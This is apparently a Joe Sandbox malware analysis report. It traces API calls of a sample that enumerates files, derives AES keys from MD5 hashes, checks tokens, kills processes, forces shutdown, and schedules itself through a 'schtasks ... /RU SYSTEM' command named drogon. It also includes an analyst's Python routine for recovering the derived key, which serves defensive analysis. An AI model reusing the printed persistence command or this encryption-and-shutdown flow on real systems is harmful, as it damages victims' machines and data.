                                                                        • Part of subcall function 04856246: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,00000000,?,?,048562E9,?,?,?,?), ref: 04856260
                                                                        • Part of subcall function 04856246: CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,048562E9,?,?,?,?), ref: 04856273
                                                                        • Part of subcall function 04856246: CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,048562E9,?,?,?,?), ref: 04856289
                                                                      • CreateThread.KERNELBASE(00000000,00000000,048560F9,?,00000000,00000000), ref: 048562F7
                                                                        • Part of subcall function 04855E9F: PathCombineW.SHLWAPI(?,?,04861554,?,?), ref: 04855EC8
                                                                        • Part of subcall function 04855E9F: FindFirstFileW.KERNELBASE(?,?), ref: 04855EE3
                                                                        • Part of subcall function 04855E9F: WaitForMultipleObjects.KERNEL32(00000001,?,00000000,00000000), ref: 04855F09
                                                                        • Part of subcall function 04855E9F: PathCombineW.SHLWAPI(?,?,?), ref: 04855FB1
                                                                        • Part of subcall function 04855E9F: StrStrIW.SHLWAPI(?,04863014), ref: 04855FE9
                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000011,?), ref: 04856312
                                                                      • CloseHandle.KERNEL32(00000000), ref: 04856319
                                                                      • CryptDestroyHash.ADVAPI32(?,?,00000011,?), ref: 04856322
                                                                      • CryptDestroyKey.ADVAPI32(?,?,?,?,?), ref: 0485632D
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Crypt$Hash$Local$CreateDestroy$ContextFreeObject$AcquireAllocBinaryCloseCombineDataDecodeHandlePathStringWait$DeriveErrorEventFileFindFirstImportInfoLastMultipleObjectsParamPublicReleaseSingleThread
                                                                      • String ID:
                                                                      • API String ID: 2692407486-0
                                                                      • Opcode ID: a918a0a33f3c80a4f67bea67e34a213124affd2ca265c579f231589a87eac20f
                                                                      • Instruction ID: dbd1758b1921983173a8954ce5ab68600c1a8f5240a6ba968e4e244dc5ad1d94
                                                                      • Opcode Fuzzy Hash: a918a0a33f3c80a4f67bea67e34a213124affd2ca265c579f231589a87eac20f
                                                                      • Instruction Fuzzy Hash: A8217F71100704AFFB202BB4EC889A7BBECEF08355B448D29FE06D1470EB69FC418A21
                                                                      APIs
                                                                      • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 04855636
                                                                      • LocalAlloc.KERNEL32(00000040,?,00000000), ref: 0485564C
                                                                      • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 04855662
                                                                      • CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 04855682
                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 0485568D
                                                                      • CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 048556A6
                                                                      • CryptImportPublicKeyInfo.CRYPT32(?,00000001,00000000,?), ref: 048556B5
                                                                      • LocalFree.KERNEL32(00000000), ref: 048556BF
                                                                      • LocalFree.KERNEL32(?), ref: 048556C8
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Crypt$Local$AllocBinaryDecodeFreeObjectString$ImportInfoPublic
                                                                      • String ID:
                                                                      • API String ID: 3940947887-0
                                                                      • Opcode ID: e6f0eda7302d488c0e166ea45fd8d5d419ae5d468853cbfb726dc5aa71bbab68
                                                                      • Instruction ID: 0594cd8f610f89167c79b309a1c97cb85ee3ce4c5249897c49a7af2ef078f0ac
                                                                      • Opcode Fuzzy Hash: e6f0eda7302d488c0e166ea45fd8d5d419ae5d468853cbfb726dc5aa71bbab68
                                                                      • Instruction Fuzzy Hash: 5A215E71501218BADF11AF929C48EDFBFBDEF097A0F008411FE08E60A4D6759A01DBA0
                                                                      APIs
                                                                      • PathCombineW.SHLWAPI(?,?,04861554,?,?), ref: 04855EC8
                                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 04855EE3
                                                                      • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,00000000), ref: 04855F09
                                                                      • PathCombineW.SHLWAPI(?,?,?), ref: 04855FB1
                                                                      • StrStrIW.SHLWAPI(?,04863014), ref: 04855FE9
                                                                      • PathFindExtensionW.SHLWAPI(?), ref: 0485601B
                                                                      • FindNextFileW.KERNELBASE(?,?), ref: 04856065
                                                                      • FindClose.KERNELBASE(?), ref: 04856077
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Find$Path$CombineFile$CloseExtensionFirstMultipleNextObjectsWait
                                                                      • String ID:
                                                                      • API String ID: 1251538951-0
                                                                      • Opcode ID: 77ba0297427a287237c5206a4951207835838becf5d31bc149b35f864ba47c8f
                                                                      • Instruction ID: db454f0ca9d1a53937090a7cf1bedc12bfe8478ee8c669688e5887e22d308f06
                                                                      • Opcode Fuzzy Hash: 77ba0297427a287237c5206a4951207835838becf5d31bc149b35f864ba47c8f
                                                                      • Instruction Fuzzy Hash: F451D431104205EFEB21EF24C8489AAB3AAEB90724F944F19ED56E70B4F736F549C752
                                                                      APIs
                                                                      • GetLocalTime.KERNEL32(?,00000000), ref: 048581AF
                                                                        • Part of subcall function 04856477: GetTickCount.KERNEL32 ref: 04856477
                                                                      • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 048581F2
                                                                      • PathAppendW.SHLWAPI(?,?), ref: 048582AF
                                                                      • wsprintfW.USER32 ref: 048582CE
                                                                        • Part of subcall function 04857FB7: wsprintfW.USER32 ref: 04857FD6
                                                                        • Part of subcall function 04857FB7: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 04857FFA
                                                                        • Part of subcall function 04857FB7: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 0485800C
                                                                        • Part of subcall function 04857FB7: lstrcatW.KERNEL32(?,\cmd.exe), ref: 04858022
                                                                        • Part of subcall function 04857FB7: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04858069
                                                                        • Part of subcall function 04857FB7: Sleep.KERNELBASE(00000000), ref: 0485807F
                                                                      Strings
                                                                      • schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00, xrefs: 048582C8
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: DirectorySystemwsprintf$AppendCountCreateEnvironmentLocalPathProcessSleepTickTimeVariablelstrcat
                                                                      • String ID: schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00
                                                                      • API String ID: 2586884543-3727968613
                                                                      • Opcode ID: a39fef13c3ed7a261fa57e3185d5611aa6cc1e0917dd4fa7294785090513a0ce
                                                                      • Instruction ID: 1a108f0fb7dd50380f30de3e7b92b1a0d77df28dc12ab71d659aa3caee5129d3
                                                                      • Opcode Fuzzy Hash: a39fef13c3ed7a261fa57e3185d5611aa6cc1e0917dd4fa7294785090513a0ce
                                                                      • Instruction Fuzzy Hash: B641E922A58348AAFB10DBE4EC16BFE73B5EF44B10F10591BE604FB1D0E6B55A84C359
                                                                      APIs
                                                                        • Part of subcall function 0485808E: wsprintfW.USER32 ref: 048580BC
                                                                        • Part of subcall function 0485808E: wsprintfW.USER32 ref: 048580CC
                                                                        • Part of subcall function 0485808E: wsprintfW.USER32 ref: 048580DC
                                                                        • Part of subcall function 0485808E: wsprintfW.USER32 ref: 048580EC
                                                                        • Part of subcall function 0485808E: wsprintfW.USER32 ref: 04858126
                                                                      • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000001,80000000), ref: 04858A54
                                                                      • ExitWindowsEx.USER32(00000006,00000000), ref: 04858A61
                                                                      • ExitProcess.KERNEL32 ref: 04858A68
                                                                        • Part of subcall function 04857FB7: wsprintfW.USER32 ref: 04857FD6
                                                                        • Part of subcall function 04857FB7: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 04857FFA
                                                                        • Part of subcall function 04857FB7: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 0485800C
                                                                        • Part of subcall function 04857FB7: lstrcatW.KERNEL32(?,\cmd.exe), ref: 04858022
                                                                        • Part of subcall function 04857FB7: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04858069
                                                                        • Part of subcall function 04857FB7: Sleep.KERNELBASE(00000000), ref: 0485807F
                                                                      Strings
                                                                      • schtasks /Delete /F /TN drogon, xrefs: 04858A35
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: wsprintf$ExitProcessSystem$CreateDirectoryEnvironmentInitiateShutdownSleepVariableWindowslstrcat
                                                                      • String ID: schtasks /Delete /F /TN drogon
                                                                      • API String ID: 3579268615-951750757
                                                                      • Opcode ID: 51245dc8a4bcaa0e1107230441f8ef7625de5c7e9713fe5da853cc3feaf834ae
                                                                      • Instruction ID: acc8d2d4f8eb5caf7a3849cab436d0aac1e686b8f8ffa12ea0f3e079f9b7baeb
                                                                      • Opcode Fuzzy Hash: 51245dc8a4bcaa0e1107230441f8ef7625de5c7e9713fe5da853cc3feaf834ae
                                                                      • Instruction Fuzzy Hash: FBE04F20262320B5E67376266C0DFDB2D8DEF02758F048F01FE49E00A087DD6991C5F6
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,00000004,?), ref: 04859090
                                                                      • LoadLibraryA.KERNELBASE(?), ref: 048590BA
                                                                      • GetProcAddress.KERNELBASE(00000000,?), ref: 048590FD
                                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0485913D
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                      • String ID:
                                                                      • API String ID: 3300690313-0
                                                                      • Opcode ID: 35d6816d578b28a41ac404931137f27b0bce38280485aacfc33b5d5e9581e1a8
                                                                      • Instruction ID: a746f04c70323b9d27f7f8b06af1bd08c921a091e0520a3a8161238face844fd
                                                                      • Opcode Fuzzy Hash: 35d6816d578b28a41ac404931137f27b0bce38280485aacfc33b5d5e9581e1a8
                                                                      • Instruction Fuzzy Hash: EB414CB1940216EFDF10DF98C888BA9B7F8FF04319F1589A9D815E7261E778E980CB50
                                                                      APIs
                                                                      • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,?,00000000,?,?,?,048562E0,?,?,?,?), ref: 048560A6
                                                                      • CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,?,048562E0,?,?,?,?), ref: 048560BA
                                                                      • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000001,?,?,?,?,048562E0,?,?,?,?), ref: 048560D3
                                                                      • CryptDestroyHash.ADVAPI32(?,?,?,?,048562E0,?,?,?,?), ref: 048560DF
                                                                        • Part of subcall function 0485559B: CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000,?,?,00000000), ref: 048555BC
                                                                        • Part of subcall function 0485559B: CryptSetKeyParam.ADVAPI32(?,00000003,?,00000000), ref: 048555CB
                                                                        • Part of subcall function 0485559B: CryptGetKeyParam.ADVAPI32(?,00000001,00000000,?,00000000), ref: 048555DA
                                                                        • Part of subcall function 0485559B: LocalAlloc.KERNEL32(00000040,?), ref: 048555EE
                                                                        • Part of subcall function 0485559B: CryptSetKeyParam.ADVAPI32(?,00000001,00000000,00000000), ref: 04855601
                                                                        • Part of subcall function 0485559B: LocalFree.KERNEL32(?), ref: 04855606
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Crypt$Param$Hash$Local$AllocCreateDataDeriveDestroyFree
                                                                      • String ID:
                                                                      • API String ID: 797921460-0
                                                                      • Opcode ID: 719d7c55e6e536056ec7d9367e1f0b21f4581f915eff00d3886d89f1a52077a7
                                                                      • Instruction ID: b43053995436b7922792199048d78334e96e44af559bd28d62adb6c54fcfcce0
                                                                      • Opcode Fuzzy Hash: 719d7c55e6e536056ec7d9367e1f0b21f4581f915eff00d3886d89f1a52077a7
                                                                      • Instruction Fuzzy Hash: 5C015E71900208BFEB10AF94EC88DAEBBBDEB04750B504879F905F6150EA75AE449B20
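The record above (CryptCreateHash with ALG_ID 0x8003, CryptHashData over 0x21 bytes, CryptDeriveKey with ALG_ID 0x660E and CRYPT_EXPORTABLE, then KP_MODE (4), KP_PADDING (3) and KP_IV (1) in the 0485559B subcall) is CryptoAPI's CryptDeriveKey path: MD5 of a 33-byte input expanded into an AES-128 key, after which mode, padding and IV are set on the key handle. The following is an added example for reproducing that derivation offline, not code from the sample or from Joe Sandbox. It assumes the standard ALG_ID values (0x8003 = CALG_MD5, 0x660E = CALG_AES_128) and Microsoft's documented CryptDeriveKey rule; the 33-byte input it feeds in is constructed, because the listing shows only the length, not the data.

```python
"""Reproduce Windows CryptoAPI CryptDeriveKey for the call pattern in the listing.

Added analyst example, not code from the sample or from Joe Sandbox. Assumes the
documented ALG_ID constants (0x8003 = CALG_MD5 for CryptCreateHash, 0x660E =
CALG_AES_128 for CryptDeriveKey) and the derivation rule from Microsoft's
CryptDeriveKey documentation. The 33-byte input below is a constructed stand-in:
the listing's CryptHashData argument 0x21 gives only the length of what is hashed.
"""
import hashlib

# ALG_ID values (CryptoAPI). The first and third appear in the listing.
CALG_MD5 = 0x8003
CALG_SHA_256 = 0x800C
CALG_AES_128 = 0x660E
CALG_AES_256 = 0x6610

KEY_LEN = {CALG_AES_128: 16, CALG_AES_256: 32}
HASHES = {CALG_MD5: "md5", CALG_SHA_256: "sha256"}
SHA2_FAMILY = {CALG_SHA_256}


def crypt_derive_key(hash_alg: int, key_alg: int, base_data: bytes) -> bytes:
    """Return the key CryptDeriveKey(hProv, key_alg, hHash, flags, &hKey) produces.

    Documented rule: the key is the first n bytes of the finished hash, except when
    the hash is not SHA-2 and the key is for AES or 3DES; then it is the first n
    bytes of H(hash XOR 0x36*64) || H(hash XOR 0x5C*64), an HMAC-style expansion.
    """
    n = KEY_LEN[key_alg]
    h = hashlib.new(HASHES[hash_alg], base_data).digest()
    if hash_alg in SHA2_FAMILY:
        return h[:n]
    # 64-byte pads: digest bytes are XORed in, the remainder keeps the constant.
    ipad = bytes(x ^ 0x36 for x in h) + b"\x36" * (64 - len(h))
    opad = bytes(x ^ 0x5C for x in h) + b"\x5C" * (64 - len(h))
    expanded = (hashlib.new(HASHES[hash_alg], ipad).digest()
                + hashlib.new(HASHES[hash_alg], opad).digest())
    return expanded[:n]


def sample_pattern_key(base_data: bytes) -> bytes:
    """The exact combination in the listing: MD5 over 0x21 bytes -> AES-128 key."""
    if len(base_data) != 0x21:  # CryptHashData length argument in the listing
        raise ValueError("the listing hashes exactly 0x21 (33) bytes")
    return crypt_derive_key(CALG_MD5, CALG_AES_128, base_data)


if __name__ == "__main__":
    constructed = bytes(range(0x21))  # constructed stand-in, not data from the sample
    print(sample_pattern_key(constructed).hex())
```

An analyst who recovers the 33 bytes the sample hashes (from a memory dump or from the encrypted-file layout) can pass them to sample_pattern_key to obtain the AES-128 key; the chaining mode, padding and IV are then whatever the KP_MODE, KP_PADDING and KP_IV calls in the 0485559B subcall set, and are not part of the derivation. Because MD5 is not in the SHA-2 family, the expansion branch applies here; a SHA-256 hash with the same key length would simply be truncated.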
                                                                      APIs
                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 048584FC
                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0485851B
                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0485853E
                                                                      • CloseHandle.KERNELBASE(00000000,?,?), ref: 04858556
                                                                        • Part of subcall function 0485841D: GetCurrentProcessId.KERNEL32(?,04858555,?,?), ref: 04858430
                                                                        • Part of subcall function 0485841D: OpenProcess.KERNEL32(00000401,00000000,?,?,?,?,04858555,?,?), ref: 0485844C
                                                                        • Part of subcall function 0485841D: OpenProcessToken.ADVAPI32(00000000,0000000E,?,00000000,?,?,?,04858555,?,?), ref: 04858464
                                                                        • Part of subcall function 0485841D: DuplicateToken.ADVAPI32(?,00000002,?,?,?,?,04858555,?,?), ref: 0485847D
                                                                        • Part of subcall function 0485841D: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 048584A3
                                                                        • Part of subcall function 0485841D: CheckTokenMembership.ADVAPI32(?,?,?), ref: 048584BA
                                                                        • Part of subcall function 0485841D: TerminateProcess.KERNEL32(00000000,00000000), ref: 048584CB
                                                                        • Part of subcall function 0485841D: FreeSid.ADVAPI32(?), ref: 048584D4
                                                                        • Part of subcall function 0485841D: CloseHandle.KERNEL32(?), ref: 048584DD
                                                                        • Part of subcall function 0485841D: CloseHandle.KERNEL32(?,?,?,?,04858555,?,?), ref: 048584E2
                                                                        • Part of subcall function 0485841D: CloseHandle.KERNEL32(00000000,?,?,?,04858555,?,?), ref: 048584E5
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandleProcess$Token$OpenProcess32$AllocateCheckCreateCurrentDuplicateFirstFreeInitializeMembershipNextSnapshotTerminateToolhelp32
                                                                      • String ID:
                                                                      • API String ID: 3061973000-0
                                                                      • Opcode ID: 3a92dc9f3fac5a45bede81b601b9b5869148f9aa0022bb07b121008f205066c6
                                                                      • Instruction ID: b2c67a8a1abfe387828db734426a3df044e48ef1cb90cbc6ed07d06e8f32c8a7
                                                                      • Opcode Fuzzy Hash: 3a92dc9f3fac5a45bede81b601b9b5869148f9aa0022bb07b121008f205066c6
                                                                      • Instruction Fuzzy Hash: EDF09631501628A7DB217BB4BC0DFEEBABCEB09314F504A92ED15E20B0E778AD54CE55
                                                                      APIs
                                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,?,0485790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege), ref: 04855561
                                                                      • GetLastError.KERNEL32(?,?,?,0485790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,048579E8), ref: 0485556B
                                                                      • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,0485790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,048579E8), ref: 04855581
                                                                      • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,0485790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,048579E8), ref: 0485558E
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Crypt$Context$AcquireErrorLastRandomRelease
                                                                      • String ID:
                                                                      • API String ID: 2963463078-0
                                                                      • Opcode ID: 2816cf06ebcc3b46bbdc4e34a8fe1f3c2332288c7efe5d2df0168882e35124bb
                                                                      • Instruction ID: 1604d95e0311cbe266d06393f2fb3b98511a3fe5c3c3dbd3a3971551e739cd1e
                                                                      • Opcode Fuzzy Hash: 2816cf06ebcc3b46bbdc4e34a8fe1f3c2332288c7efe5d2df0168882e35124bb
                                                                      • Instruction Fuzzy Hash: FDF01C36500208FBDF109BA6ED09F8E7AFAEBC4751F208414FA05D2110D638AE05EB20
                                                                      APIs
                                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,00000000,?,048562C3,?), ref: 04855520
                                                                      • GetLastError.KERNEL32(?,048562C3,?), ref: 04855528
                                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008,?,048562C3,?), ref: 0485553E
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AcquireContextCrypt$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 2779411412-0
                                                                      • Opcode ID: 07553151866a4df4ddfe0248d59bbdf0d43e7cde5e24bc1a71e2b9fd522a2bdb
                                                                      • Instruction ID: 1a21cc24cf065d0766b55c4d6573515691d710675989e829563f615b6f9bcdb5
                                                                      • Opcode Fuzzy Hash: 07553151866a4df4ddfe0248d59bbdf0d43e7cde5e24bc1a71e2b9fd522a2bdb
                                                                      • Instruction Fuzzy Hash: B9E04F7138431D7AFB201998EC81F563A9DEB18754F508426FB00E6191CAD5AD0457A4
                                                                      APIs
                                                                      • NetServerGetInfo.NETAPI32(00000000,00000065,?,6F994950,?,?,04858C7C), ref: 04857D5F
                                                                      • NetApiBufferFree.NETAPI32(?,?,?,04858C7C), ref: 04857D82
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: BufferFreeInfoServer
                                                                      • String ID:
                                                                      • API String ID: 3855943681-0
                                                                      • Opcode ID: 12efc3faa45e546896ec4e7f66034a47ceb4e9cf440997adff9675e8826111ee
                                                                      • Instruction ID: bf5630e32987148b3cd441d0c33b868a19a65c44665809a5276db0246a311c5c
                                                                      • Opcode Fuzzy Hash: 12efc3faa45e546896ec4e7f66034a47ceb4e9cf440997adff9675e8826111ee
                                                                      • Instruction Fuzzy Hash: D5E09271701724A7EB24CA55DD08BBA766CDF00A91F008619AC41E2114E324FE0587D0

                                                                      Control-flow Graph (rendered graph; legend: Executed / Not Executed)
                                                                      Basic blocks, as node id: address range, calls; -> successors
                                                                      • 86: 48579d7-48579ec, call 4857897; -> 89, 90
                                                                      • 89: 48579fc-4857a03, call 4857f04; -> 94, 95
                                                                      • 90: 48579ee-48579f7, call 485923f; -> 89
                                                                      • 94: 4857a05-4857a07, ExitProcess
                                                                      • 95: 4857a0d-4857a14; -> 96, 97
                                                                      • 96: 4857a16, call 4857e8e; -> 97
                                                                      • 97: 4857a1b-4857acf, call 48584ee, call 48510a7, WSAStartup, call 4856c5f (x2), InitializeCriticalSection, call 485652f, call 4857dd0, call 4858192, CreateEventW, CreateThread; -> 113, 114
                                                                      • 113: 4857ad5-4857ae8, CreateThread; -> 115, 116
                                                                      • 114: 4857b99-4857ba0; -> 117, 118
                                                                      • 115: 4857af8-4857b0a, call 4856cc8; -> 128, 129
                                                                      • 116: 4857aea-4857af1; -> 115, 119
                                                                      • 117: 4857ba2-4857baf, call 485554a; -> 118, 130
                                                                      • 118: 4857bde-4857bf1, Sleep, call 4858a23; -> 124
                                                                      • 119: 4857af3, call 4857146; -> 115
                                                                      • 124: 4857bf6-4857c16, GetSystemDirectoryW; -> 131, 132
                                                                      • 128: 4857b63-4857b93, call 4856cc8, CreateThread, call 485a420, Sleep; -> 114
                                                                      • 129: 4857b0c-4857b31, call 4856c5f, call 48585fb; -> 128, 148
                                                                      • 130: 4857bb1; -> 135
